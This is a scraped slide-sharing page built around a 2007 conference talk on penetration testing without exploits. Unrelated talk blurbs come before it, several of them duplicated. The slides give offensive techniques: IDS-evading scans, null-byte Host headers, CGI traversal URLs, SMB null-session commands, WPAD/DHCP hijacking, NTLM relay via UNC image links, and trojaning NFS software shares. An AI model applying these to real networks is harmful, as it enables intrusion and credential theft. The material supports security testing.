This document discusses tactics for penetration testing networks without using exploits. It advocates targeting vulnerabilities in applications, processes, users, and trust relationships. Several discovery and profiling techniques are presented, including using tools to identify personnel and their access, mapping networks through DNS and port scans, finding applications through slow targeted scans, and monitoring processes and client applications to find entry points. The document suggests an opportunistic approach of expanding the scope of tests to gain access to data through any available means.
Thotcon 0x5 - Retroactive Wiretapping VPN over DNSJohn Bambenek
These are the slides of a talk by John Bambenek at THOTCON 0x5 in Chicago.
Imagine your first day at a client site and you spend your time figuring out what’s going on with the network. You query passive DNS to find tons of apparently VPN over DNS endpoints on your network. What starts as a simple incident investigation process sees the tables turned on those who used the protocol to hide their tracks. This talk will discuss reverse engineering VPN over DNS (vpnoverdns.com) and how weaknesses in using DNS tunneling makes it trivial to retroactively wiretap all communications over the protocol long after the fact.
How to Respond to Active Shooter Incidents in the Workplace G&A Partners
Over the past few months, coverage of mass shootings at Umpqua Community College in Roseburg, Oregon, and the Inland Regional Center in San Bernardino, California, has gripped the country and shone a national spotlight on what law enforcement calls “active shooter incidents.” According to a report released by the FBI, the most likely places for an active shooter incident to occur are commercial businesses, a fact that has many employers worried about the safety of their employees and customers.
Thotcon 0x5 - Retroactive Wiretapping VPN over DNSJohn Bambenek
These are the slides of a talk by John Bambenek at THOTCON 0x5 in Chicago.
Imagine your first day at a client site and you spend your time figuring out what’s going on with the network. You query passive DNS to find tons of apparently VPN over DNS endpoints on your network. What starts as a simple incident investigation process sees the tables turned on those who used the protocol to hide their tracks. This talk will discuss reverse engineering VPN over DNS (vpnoverdns.com) and how weaknesses in using DNS tunneling makes it trivial to retroactively wiretap all communications over the protocol long after the fact.
How to Respond to Active Shooter Incidents in the Workplace G&A Partners
Over the past few months, coverage of mass shootings at Umpqua Community College in Roseburg, Oregon, and the Inland Regional Center in San Bernardino, California, has gripped the country and shone a national spotlight on what law enforcement calls “active shooter incidents.” According to a report released by the FBI, the most likely places for an active shooter incident to occur are commercial businesses, a fact that has many employers worried about the safety of their employees and customers.
Please download this PowerPoint to view the .gifs and embedded videos properly. Estimated ~200mb download.
Close Quarters Battle. Immediate versus Limited Entries by Rye from CQB-TEAM. Enjoy!
Many Web users are resigned to the fact that their identities are perpetually at risk, because authentication mechanisms are either too weak or too difficult to manage. Yet, some efforts�OpenID and Windows CardSpace�aim to create an identity metasystem that is strong, flexible, trivial to use and can work across any site on the Internet. Learn how these systems work and discuss what else needs to happen before truly secure online identity and access management can become a reality.
CrowdStrike CrowdCast: Is Ransomware Morphing Beyond The Ability Of Standard ...CrowdStrike
Learn how to prevent & detect even the most complex “file-less” ransomware exploits
Ransomware continues to evolve as perpetrators develop new exploits with consequences that can be dramatic and immediate. The purveyors of ransomware continue to prosper with adversaries developing new strains such as Zepto and Cerber that are proving to be more challenging than ever. Other exploits can alter programmable logic controller (PLC) parameters and adversely impact mechanical systems. Clearly, new defense approaches are needed because organizations can no longer rely on backups and conventional security solutions to protect them. Join CrowdStrike Senior Security Architect Dan Brown as he offers details on these sophisticated new ransomware threats, and reveals recent innovations designed to offer better protection – including new indicator of attack (IOA) behavioral analysis methodologies that can detect and prevent even the most complex “file-less” ransomware exploits.
Attend this CrowdCast where Dan will discuss:
--The challenges of defending against dangerous new variants, such as Zepto and Cerber
--Real-world examples of ransomware in action and the sophisticated tactics being used by a variety of adversaries
--How the CrowdStrike Falcon cloud-delivered platform can defend your organization against new super strains of ransomware that use sophisticated malware-free tactics
Frontera распределенный робот для обхода веба в больших объемах / Александр С...Ontico
В этом докладе я собираюсь поделиться нашим опытом обхода испанского интернета. Мы поставили перед собой задачу обойти около 600 тысяч веб-сайтов в зоне .es с целью сбора статистики об узлах и их размерах. Я расскажу об архитектуре робота, хранилища, проблемах, с которыми мы столкнулись при обходе, и их решении.
Наше решение доступно в форме open source фреймворка Frontera. Фреймворк позволяет построить распределенного робота для скачивания страниц из Интернета в больших объемах в реальном времени. Также он может быть использован для построения сфокусированных роботов для выкачивания подмножества заранее известных веб-сайтов.
Фреймворк предлагает: настраиваемое хранилище URL документов (RDBMS или Key Value), управление стратегиями обхода, абстракцию транспортного уровня, абстракцию модуля загрузки.
Доклад построен в увлекательной форме: описание проблемы, решение и проблемы, которые возникли в ходе разработки решения.
Peer-to-Peer (P2P) has become a buzzword and file-sharing applications like Kazaa are very popular and account for a lot of Internet traffic nowadays. The emphasis of my talk will be on the evolution of P2P file-sharing and the technology behind the scenes. I also try to give examples how P2P can be used for other applications like Skype.
From the Un-Distinguished Lecture Series (http://ws.cs.ubc.ca/~udls/). The talk was given Feb. 16, 2007.
Just In Time Scalability Agile Methods To Support Massive Growth PresentationLong Nguyen
IMVU is an online destination where adults and teens meet new people in 3D. IMVU won the 2008 Virtual Worlds Innovation Award and was also named a Rising Star in the 2008 Silicon Valley Technology Fast 50 program.
These are excerpts from the IMVU PDF presentation of their architecture which can be viewed or downloaded here.
Static Analysis Techniques For Testing Application Security - Houston Tech FestDenim Group
Static Analysis of software refers to examining source code and other software artifacts without executing them. This presentation looks at how these techniques can be used to identify security defects in applications. Approaches examined will range from simple keyword search methods used to identify calls to banned functions through more sophisticated data flow analysis used to identify more complicated issues such as injection flaws. In addition, a demonstration will be given of two freely-available static analysis tools: FXCop and the beta version of Microsoft’s XSSDetect tool. Finally, some approaches will be presented on how organizations can start using static analysis tools as part of their development and quality assurance processes.
Targeted trojan attacks first attracted attention in early 2005, when the UK NISCC warned of their wide spread use in attacks on UK national infrastructure. Incidents such as "Titan Rain" and the compromise of US Department of State computer systems have increased their profile in the last two years. This presentation will consist of hard, technical information on attacks in the form of a case study of an actual attack ongoing since 2005. It covers exploitation techniques, draws general conclusions on attack methodologies and focuses on how to defend against the dark arts.
Please download this PowerPoint to view the .gifs and embedded videos properly. Estimated ~200mb download.
Close Quarters Battle. Immediate versus Limited Entries by Rye from CQB-TEAM. Enjoy!
Many Web users are resigned to the fact that their identities are perpetually at risk, because authentication mechanisms are either too weak or too difficult to manage. Yet, some efforts�OpenID and Windows CardSpace�aim to create an identity metasystem that is strong, flexible, trivial to use and can work across any site on the Internet. Learn how these systems work and discuss what else needs to happen before truly secure online identity and access management can become a reality.
CrowdStrike CrowdCast: Is Ransomware Morphing Beyond The Ability Of Standard ...CrowdStrike
Learn how to prevent & detect even the most complex “file-less” ransomware exploits
Ransomware continues to evolve as perpetrators develop new exploits with consequences that can be dramatic and immediate. The purveyors of ransomware continue to prosper with adversaries developing new strains such as Zepto and Cerber that are proving to be more challenging than ever. Other exploits can alter programmable logic controller (PLC) parameters and adversely impact mechanical systems. Clearly, new defense approaches are needed because organizations can no longer rely on backups and conventional security solutions to protect them. Join CrowdStrike Senior Security Architect Dan Brown as he offers details on these sophisticated new ransomware threats, and reveals recent innovations designed to offer better protection – including new indicator of attack (IOA) behavioral analysis methodologies that can detect and prevent even the most complex “file-less” ransomware exploits.
Attend this CrowdCast where Dan will discuss:
--The challenges of defending against dangerous new variants, such as Zepto and Cerber
--Real-world examples of ransomware in action and the sophisticated tactics being used by a variety of adversaries
--How the CrowdStrike Falcon cloud-delivered platform can defend your organization against new super strains of ransomware that use sophisticated malware-free tactics
Frontera распределенный робот для обхода веба в больших объемах / Александр С...Ontico
В этом докладе я собираюсь поделиться нашим опытом обхода испанского интернета. Мы поставили перед собой задачу обойти около 600 тысяч веб-сайтов в зоне .es с целью сбора статистики об узлах и их размерах. Я расскажу об архитектуре робота, хранилища, проблемах, с которыми мы столкнулись при обходе, и их решении.
Наше решение доступно в форме open source фреймворка Frontera. Фреймворк позволяет построить распределенного робота для скачивания страниц из Интернета в больших объемах в реальном времени. Также он может быть использован для построения сфокусированных роботов для выкачивания подмножества заранее известных веб-сайтов.
Фреймворк предлагает: настраиваемое хранилище URL документов (RDBMS или Key Value), управление стратегиями обхода, абстракцию транспортного уровня, абстракцию модуля загрузки.
Доклад построен в увлекательной форме: описание проблемы, решение и проблемы, которые возникли в ходе разработки решения.
Peer-to-Peer (P2P) has become a buzzword and file-sharing applications like Kazaa are very popular and account for a lot of Internet traffic nowadays. The emphasis of my talk will be on the evolution of P2P file-sharing and the technology behind the scenes. I also try to give examples how P2P can be used for other applications like Skype.
From the Un-Distinguished Lecture Series (http://ws.cs.ubc.ca/~udls/). The talk was given Feb. 16, 2007.
Just In Time Scalability Agile Methods To Support Massive Growth PresentationLong Nguyen
IMVU is an online destination where adults and teens meet new people in 3D. IMVU won the 2008 Virtual Worlds Innovation Award and was also named a Rising Star in the 2008 Silicon Valley Technology Fast 50 program.
These are excerpts from the IMVU PDF presentation of their architecture which can be viewed or downloaded here.
Static Analysis Techniques For Testing Application Security - Houston Tech FestDenim Group
Static Analysis of software refers to examining source code and other software artifacts without executing them. This presentation looks at how these techniques can be used to identify security defects in applications. Approaches examined will range from simple keyword search methods used to identify calls to banned functions through more sophisticated data flow analysis used to identify more complicated issues such as injection flaws. In addition, a demonstration will be given of two freely-available static analysis tools: FXCop and the beta version of Microsoft’s XSSDetect tool. Finally, some approaches will be presented on how organizations can start using static analysis tools as part of their development and quality assurance processes.
Targeted trojan attacks first attracted attention in early 2005, when the UK NISCC warned of their wide spread use in attacks on UK national infrastructure. Incidents such as "Titan Rain" and the compromise of US Department of State computer systems have increased their profile in the last two years. This presentation will consist of hard, technical information on attacks in the form of a case study of an actual attack ongoing since 2005. It covers exploitation techniques, draws general conclusions on attack methodologies and focuses on how to defend against the dark arts.
Pushing the limits of ePRTC: 100ns holdover for 100 daysAdtran
At WSTS 2024, Alon Stern explored the topic of parametric holdover and explained how recent research findings can be implemented in real-world PNT networks to achieve 100 nanoseconds of accuracy for up to 100 days.
GridMate - End to end testing is a critical piece to ensure quality and avoid...ThomasParaiso2
End to end testing is a critical piece to ensure quality and avoid regressions. In this session, we share our journey building an E2E testing pipeline for GridMate components (LWC and Aura) using Cypress, JSForce, FakerJS…
Transcript: Selling digital books in 2024: Insights from industry leaders - T...BookNet Canada
The publishing industry has been selling digital audiobooks and ebooks for over a decade and has found its groove. What’s changed? What has stayed the same? Where do we go from here? Join a group of leading sales peers from across the industry for a conversation about the lessons learned since the popularization of digital books, best practices, digital book supply chain management, and more.
Link to video recording: https://bnctechforum.ca/sessions/selling-digital-books-in-2024-insights-from-industry-leaders/
Presented by BookNet Canada on May 28, 2024, with support from the Department of Canadian Heritage.
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...Neo4j
Leonard Jayamohan, Partner & Generative AI Lead, Deloitte
This keynote will reveal how Deloitte leverages Neo4j’s graph power for groundbreaking digital twin solutions, achieving a staggering 100x performance boost. Discover the essential role knowledge graphs play in successful generative AI implementations. Plus, get an exclusive look at an innovative Neo4j + Generative AI solution Deloitte is developing in-house.
Securing your Kubernetes cluster_ a step-by-step guide to success !KatiaHIMEUR1
Today, after several years of existence, an extremely active community and an ultra-dynamic ecosystem, Kubernetes has established itself as the de facto standard in container orchestration. Thanks to a wide range of managed services, it has never been so easy to set up a ready-to-use Kubernetes cluster.
However, this ease of use means that the subject of security in Kubernetes is often left for later, or even neglected. This exposes companies to significant risks.
In this talk, I'll show you step-by-step how to secure your Kubernetes cluster for greater peace of mind and reliability.
Dr. Sean Tan, Head of Data Science, Changi Airport Group
Discover how Changi Airport Group (CAG) leverages graph technologies and generative AI to revolutionize their search capabilities. This session delves into the unique search needs of CAG’s diverse passengers and customers, showcasing how graph data structures enhance the accuracy and relevance of AI-generated search results, mitigating the risk of “hallucinations” and improving the overall customer journey.
Epistemic Interaction - tuning interfaces to provide information for AI supportAlan Dix
Paper presented at SYNERGY workshop at AVI 2024, Genoa, Italy. 3rd June 2024
https://alandix.com/academic/papers/synergy2024-epistemic/
As machine learning integrates deeper into human-computer interactions, the concept of epistemic interaction emerges, aiming to refine these interactions to enhance system adaptability. This approach encourages minor, intentional adjustments in user behaviour to enrich the data available for system learning. This paper introduces epistemic interaction within the context of human-system communication, illustrating how deliberate interaction design can improve system understanding and adaptation. Through concrete examples, we demonstrate the potential of epistemic interaction to significantly advance human-computer interaction by leveraging intuitive human communication strategies to inform system design and functionality, offering a novel pathway for enriching user-system engagements.
GraphRAG is All You need? LLM & Knowledge GraphGuy Korland
Guy Korland, CEO and Co-founder of FalkorDB, will review two articles on the integration of language models with knowledge graphs.
1. Unifying Large Language Models and Knowledge Graphs: A Roadmap.
https://arxiv.org/abs/2306.08302
2. Microsoft Research's GraphRAG paper and a review paper on various uses of knowledge graphs:
https://www.microsoft.com/en-us/research/blog/graphrag-unlocking-llm-discovery-on-narrative-private-data/
Removing Uninteresting Bytes in Software FuzzingAftab Hussain
Imagine a world where software fuzzing, the process of mutating bytes in test seeds to uncover hidden and erroneous program behaviors, becomes faster and more effective. A lot depends on the initial seeds, which can significantly dictate the trajectory of a fuzzing campaign, particularly in terms of how long it takes to uncover interesting behaviour in your code. We introduce DIAR, a technique designed to speedup fuzzing campaigns by pinpointing and eliminating those uninteresting bytes in the seeds. Picture this: instead of wasting valuable resources on meaningless mutations in large, bloated seeds, DIAR removes the unnecessary bytes, streamlining the entire process.
In this work, we equipped AFL, a popular fuzzer, with DIAR and examined two critical Linux libraries -- Libxml's xmllint, a tool for parsing xml documents, and Binutil's readelf, an essential debugging and security analysis command-line tool used to display detailed information about ELF (Executable and Linkable Format). Our preliminary results show that AFL+DIAR does not only discover new paths more quickly but also achieves higher coverage overall. This work thus showcases how starting with lean and optimized seeds can lead to faster, more comprehensive fuzzing campaigns -- and DIAR helps you find such seeds.
- These are slides of the talk given at IEEE International Conference on Software Testing Verification and Validation Workshop, ICSTW 2022.
A tale of scale & speed: How the US Navy is enabling software delivery from l...sonjaschweigert1
Rapid and secure feature delivery is a goal across every application team and every branch of the DoD. The Navy’s DevSecOps platform, Party Barge, has achieved:
- Reduction in onboarding time from 5 weeks to 1 day
- Improved developer experience and productivity through actionable findings and reduction of false positives
- Maintenance of superior security standards and inherent policy enforcement with Authorization to Operate (ATO)
Development teams can ship efficiently and ensure applications are cyber ready for Navy Authorizing Officials (AOs). In this webinar, Sigma Defense and Anchore will give attendees a look behind the scenes and demo secure pipeline automation and security artifacts that speed up application ATO and time to production.
We will cover:
- How to remove silos in DevSecOps
- How to build efficient development pipeline roles and component templates
- How to deliver security artifacts that matter for ATO’s (SBOMs, vulnerability reports, and policy evidence)
- How to streamline operations with automated policy checks on container images
A tale of scale & speed: How the US Navy is enabling software delivery from l...
Tactical Exploitation - hdm valsmith
1. Tactical Exploitation
“the other way to pen-test “
hdm / valsmith
Black Hat USA 2007
Las Vegas – August 2007
2. who are we ?
H D Moore <hdm [at] metasploit.com>
BreakingPoint Systems || Metasploit
Valsmith <valsmith [at] metasploit.com>
Offensive Computing || Metasploit
Las Vegas – August 2007
3. why listen ?
A different approach to pwning
•
Lots of fun techniques, new tools
•
Real-world tested ;-)
•
Las Vegas – August 2007
4. what do we cover ?
Target profiling
•
Discovery tools and techniques
•
Exploitation
•
Getting you remote access
•
Las Vegas – August 2007
5. the tactical approach
Vulnerabilites are transient
•
Target the applications
•
Target the processes
•
Target the people
•
Target the trusts
•
You WILL gain access.
•
Las Vegas – August 2007
6. the tactical approach
Crackers are opportunists
•
Expand the scope of your tests
•
Everything is fair game
•
What you dont test...
•
Someone else will!
•
Las Vegas – August 2007
7. the tactical approach
Hacking is not about exploits
•
The target is the data, not r00t
•
Hacking is using what you have
•
Passwords, trust relationships
•
Service hijacking, auth tickets
•
Las Vegas – August 2007
8. personnel discovery
Security is a people problem
•
People write your software
•
People secure your network
•
Identify the meatware first
•
Las Vegas – August 2007
9. personnel discovery
Identifying the meatware
•
• Google
• Newsgroups
SensePost tools
•
Evolution from Paterva.com
•
Las Vegas – August 2007
10. personnel discovery
These tools give us
•
Full names, usernames, email
•
Employment history
•
Phone numbers
•
Personal sites
•
Las Vegas – August 2007
12. personnel discovery
Started with company and jobs
•
Found online personnel directory
•
Found people with access to data
•
Found resumes, email addresses
•
Email name = username = target
•
Las Vegas – August 2007
13. personnel discovery
Joe Targetstein
•
Works as lead engineer in semiconductor department
•
Email address joet@company.com
•
Old newsgroup postings show
•
joet@joesbox.company.com
Now we have username and a host to target to go
•
after semi conductor information
Las Vegas – August 2007
14. network discovery
Identify your target assets
•
Find unknown networks
•
Find third-party hosts
•
Dozens of great tools...
•
Lets stick to the less-known ones
•
Las Vegas – August 2007
15. network discovery
The overused old busted
•
Whois, Google, zone transfers
•
Reverse DNS lookups
•
Las Vegas – August 2007
16. network discovery
The shiny new hotness
•
Other people's services
•
CentralOps.net, DigitalPoint.com
•
DomainTools.com
•
Paterva.com
•
Las Vegas – August 2007
19. network discovery
What does this get us?
•
Proxied DNS probes, transfers
•
List of virtual hosts for each IP
•
Port scans, traceroutes, etc
•
Gold mine of related info
•
Las Vegas – August 2007
20. network discovery
Active discovery techniques
•
Trigger SMTP bounces
•
Brute force HTTP vhosts
•
Watch outbound DNS
•
Just email the users!
•
Las Vegas – August 2007
21. network discovery
Received: from unknown (HELO gateway1.rsasecurity.com)
(216.162.240.250)
by [censored] with SMTP; 28 Jun 2007 15:11:29 -0500
Received: from hyperion.rsasecurity.com by
gateway1.rsasecurity.com
via smtpd (for [censored]. [xxx.xxx.xxx.xxx]) with
SMTP; Thu, 28 Jun 2007 16:11:29 -0400
by hyperion.na.rsa.net (MOS 3.8.3-GA)
To: user@[censored]
Subject: Returned mail: User unknown (from [10.100.8.152])
Las Vegas – August 2007
22. application discovery
If the network is the toast...
•
Applications are the butter.
•
Each app is an entry point
•
Finding these apps is the trick
•
Las Vegas – August 2007
23. application discovery
Tons of great tools
•
Nmap, Amap, Nikto, Nessus
•
Commercial tools
•
Las Vegas – August 2007
24. application discovery
Slow and steady wins the deface
•
Scan for specific port, one port only
•
IDS/IPS can't handle slow scans
•
Ex. nmap -sS -P0 -T 0 -p 1433 ips
•
Las Vegas – August 2007
25. application discovery
Example target had custom IDS to
•
detect large # of host connections
Standard nmap lit up IDS like XMAS
•
One port slow scan never detected
•
Know OS based on 1 port (139/22)
•
Las Vegas – August 2007
26. application discovery
Target had internal app for software licensing /
•
distribution
~10,000 nodes had app installed
•
A couple of hours with IDA/Ollydbg showed
•
static Admin password in app's memory
All accessible nodes owned, 0 exploits used
•
Las Vegas – August 2007
27. application discovery
Web Application Attack and Audit
•
Framework
• W3AF: “Metasploit for the web”
Metasploit 3 scanning modules
•
• Scanning mixin
Las Vegas – August 2007
29. client app discovery
Client applications are fun!
•
Almost always exploitable
•
Easy to fingerprint remotely
•
Your last-chance entrance
•
Las Vegas – August 2007
30. client app discovery
Common probe methods
•
Mail links to the targets
•
Review exposed web logs
•
Send MDNs to specific victims
•
Abuse all, everyone, team aliases
•
Las Vegas – August 2007
31. process discovery
Track what your target does
•
Activity via IP ID counters
•
Last-modified headers
•
FTP server statistics
•
Las Vegas – August 2007
32. process discovery
Look for patterns of activity
•
Large IP ID increments at night
•
FTP stats at certain times
•
Microsoft FTP SITE STATS
•
Web pages being uploaded
•
Check timestamps on images
•
Las Vegas – August 2007
33. process discovery
Existing tools?
•
None, really...
•
Easy to script
•
• Use “hping” for IP ID tracking
• Use netcat for SITE STATS
Las Vegas – August 2007
34. process discovery
ABOR : 2138 NOOP : 147379 SIZE : 76980
ACCT : 2 OPTS : 21756 SMNT : 16
ALLO : 32 PASS : 2050555100 STAT : 30812
APPE : 74 PASV : 2674909 STOR : 3035
CDUP : 5664 PORT : 786581 STRU : 3299
CWD : 388634 PWD : 179852 SYST : 175579
DELE : 1910 QUIT : 143771 TYPE : 3038879
FEAT : 2970 REIN : 16 USER : 2050654280
HELP : 470 REST : 31684 XCWD : 67
LIST : 3228866 RETR : 153140 XMKD : 12
MDTM : 49070 RMD : 41 XPWD : 1401
MKD : 870 RNFR : 58 XRMD : 2
MODE : 3938 RNTO : 2
NLST : 1492 SITE : 2048
ftp.microsoft.com [node]
SITE STATS / Uptime: 47 days
Las Vegas – August 2007
35. process discovery
<< backups run at midnight
USA people wake up >>
IP ID Monitoring / HACKER.COM
Las Vegas – August 2007
36. 15 Minute Break
Come back for the exploits!
•
Las Vegas – August 2007
37. re-introduction
In our last session...
•
Discovery techniques and tools
•
In this session...
•
• Compromising systems!
Las Vegas – August 2007
38. external network
The crunchy candy shell
•
Exposed hosts and services
•
VPN and proxy services
•
Client-initiated sessions
•
Las Vegas – August 2007
39. attacking ftp transfers
Active FTP transfers
•
Clients often expose data ports
•
NAT + Active FTP = Firewall Hole
•
Passive FTP transfers
•
Data port hijacking: DoS at least
•
pasvagg.pl still works just fine :-)
•
Las Vegas – August 2007
40. attacking web servers
Brute force vhosts, files, dirs
•
http://www.cray.com/old/
•
Source control files left in root
•
http://www.zachsong.com/CVS/Entries
•
Las Vegas – August 2007
41. attacking web servers
Apache Reverse Proxying
•
GET /%00 HTTP/1.1
Host: realhost.com
Apache Dynamic Virtual Hosting
•
GET / HTTP/1.1
Host: %00/
Las Vegas – August 2007
42. load balancers
Cause load balancer to “leak”
•
internal IP information
Use TCP half-close HTTP request
•
Alteon ACEdirector good example
•
Las Vegas – August 2007
43. load balancers
ACEdirector mishandles TCP half-
•
close requests
•
Behavior can be used as signature
•
for existence of Load Balancer
•
Direct packets from real webserver
•
fowarded back to client (with IP)
Las Vegas – August 2007
44. cgi case study
Web Host with 1000's of sites
•
Had demo CGI for customers
•
CGI had directory traversal
•
www.host.com/cgi-bin/vuln.pl/../../cgi
•
CGI executable + writable on every
•
directory
Common on web hosts!
•
•
Las Vegas – August 2007
45. cgi case study
Enumerated:
•
• Usernames
• Dirs
• Backup files
• Other CGI scripts
• VHOSTS
Las Vegas – August 2007
46. cgi case study
Target happened to run solaris
•
• Solaris treats dirs as files
• cat /dirname = ls /dirname
http://www.host.com/cgi-bin/vuln.cgi/../../../../dirname%00.html
•
Las Vegas – August 2007
47. cgi case study
Found CGI script names
•
Googled for vulns
•
Gained shell 100's of different ways
•
Owned due to variety of layered
•
configuration issues
Las Vegas – August 2007
48. attacking dns servers
Brute force host names
•
XID sequence analysis
•
• BIND 9: PRNG / Birthday
• VxWorks: XID = XID + 1
Return extra answers in response
•
Las Vegas – August 2007
49. authentication relays
SMB/CIFS clients are fun!
•
Steal hashes, redirect, MITM
•
NTLM relay between protocols
•
SMB/HTTP/SMTP/POP3/IMAP
•
More on this later...
•
Las Vegas – August 2007
50. social engineering
Give away free toys
•
CDROMs, USB keys, N800s
•
Replace UPS with OpenWRT
•
Cheap and easy to make
•
Las Vegas – August 2007
51. internal network
The soft chewy center
•
This is the fun part :)
•
Easy to trick clients
•
Las Vegas – August 2007
52. netbios services
NetBIOS names are magic
•
• WPAD
• CALICENSE
Las Vegas – August 2007
53. dns services
Microsoft DNS + DHCP = fun
•
• Inject host names into DNS
• Hijack the entire network
dhcpcd -h WPAD -i eth0
•
Las Vegas – August 2007
54. Hijacking NTLM
Quickly own all local workstations
•
Gain access to mail and web sites
•
A new twist on “smbrelay2.cpp”
•
Yes, it was released in 2001.
•
Now implemented in Metasploit 3
•
Las Vegas – August 2007
55. Hijacking NTLM
1. MITM all outbound web traffic
Cache poison the “WPAD” host
•
Plain old ARP spoofing
•
DHCP / NetBIOS + “WPAD”
•
Run a rogue WiFi access point
•
Manipulate TOR connections
•
Las Vegas – August 2007
56. Hijacking NTLM
2. Redirect HTTP requests to “intranet”
WPAD + SOCKS server
•
SQUID + transparent proxying
•
302 Redirect
•
Las Vegas – August 2007
57. Hijacking NTLM
3. Return HTML page with UNC link
IE 5/6/7: <img src=”ipsharei.jpg”>
•
Firefox: mozicon-url:file:////ip/share/i.jpg
•
Third-party plugins:
•
Adobe PDF Viewer
•
Windows Media Player
•
Microsoft Office
•
Las Vegas – August 2007
58. Hijacking NTLM
4. Accept SMB connection and relay
Accept connection from the client
•
Connect to the target server (or client)
•
Ask target for Challenge Key
•
Provide this Key to the client
•
Allow the client to authenticate
•
Las Vegas – August 2007
59. Hijacking NTLM
5. Executing remote code
Disconnect the client
•
Use authenticated session
•
• ADMIN$ + Service Control Manager
• Access data, call RPC routines, etc
• Access the remote registry
Las Vegas – August 2007
61. file servers
“NAS appliances are safe and secure”
•
Don't worry, the vendor sure doesn't
•
Unpatched Samba daemons
•
• Snap, TeraServer, OS X, etc.
Inconsistent file permissions
•
AFP vs NFS vs SMB
•
Las Vegas – August 2007
62. samba is awesome
1999 called, want their bugs back
•
Remember those scary “NULL Sessions”
•
Samba ENUM / SID2USR user listing
•
Massive information leaks via DCERPC
•
• Shares, Users, Policies
• Brute force accounts (no lockout)
Las Vegas – August 2007
63. smb case study
Old bugs back to haunt new boxes
•
Found OS X Box running SMB
•
User sent mail touting OS X sec
•
Previous scans had found vulns
•
User: “false positive, its OS X”
•
Us: “Owned”
•
Las Vegas – August 2007
64. smb case study
Performed Null Session
•
net use osxsmbipc$ “” /user:””
•
Enumerated users and shares
•
• Brute forced several user accounts
• Got shell, escalated to root
• User: “but . .but . . its OS X!”
Las Vegas – August 2007
65. samba vs metasploit
Metasploit modules for Samba
•
Linux (vSyscall + Targets)
•
Mac OS X (PPC/x86)
•
Solaris (SPARC,x86)
•
Auxiliary PoCs
•
Las Vegas – August 2007
66. nfs services
NFS is your friend
•
Dont forget its easy cousin NIS
•
Scan for port 111 / 2049
•
showmount -e / showmount -a
•
Whats exported, whose mounting?
•
Las Vegas – August 2007
67. nfs services
Exported NFS home directories
•
Important target!
•
If you get control
•
Own every node that mounts it
•
Las Vegas – August 2007
68. nfs services
If you are root on home server
•
Become anyone (NIS/su)
•
Harvest known_hosts files
•
Harvest allowed_keys
•
Modify .login, etc. + insert trojans
•
Las Vegas – August 2007
69. nfs services
Software distro servers are fun!
•
All nodes access over NFS
•
Write to software distro directories
•
Trojan every node at once
•
No exploits needed!
•
Las Vegas – August 2007
70. file services
Example: all nodes were diskless / patched
•
Clients got software from NFS server
•
We hacked the software server
•
Using trust hijacking explained later
•
Inserted trojaned gnu binaries
•
1000's of nodes sent us shells
•
Las Vegas – August 2007
71. trust relationships
The target is unavailable to YOU
•
Not to another host you can reach...
•
Networks may not trust everyone
•
But they often trust each other :)
•
•
Las Vegas – August 2007
72. trusts
Deal with firewalls/TCP wrappers/ACLs
•
Find a node that is accepted and own it
•
People wrapper Unix and leave Windows
•
open
Hack the Windows box and port forward
•
past wrappers
Las Vegas – August 2007
73. trusts
Example: Mixed network with Unix
•
wrapperd
Target Solaris homedir server
•
Had auth credentials but couldn't reach
•
port 22
Found 1 vulnerable win box , owned /
•
installed portfworward to homedir port 22
•
Las Vegas – August 2007
74. Hijacking SSH
Idea is to abuse legitimate users access
•
over SSH
If user can access other systems, why
•
can't you? (even without users password)
One time passwords? No problem!
•
Intel gathering
•
Las Vegas – August 2007
75. Hijacking SSH
Available tools
•
Metalstorm ssh hijacking
•
• Trojaned ssh clients
• SSH master modes
Dont for get TTY hijacking
•
Appcap
•
• TTYWatcher
Who suspects a dead SSH session?
•
Las Vegas – August 2007
77. Hijacking Kerberos
Kerberos is great for one time
•
authentication . . even for hackers
Idea is to become a user and hijack
•
kerberos tickets
Gain access to other trusted nodes
•
•
Las Vegas – August 2007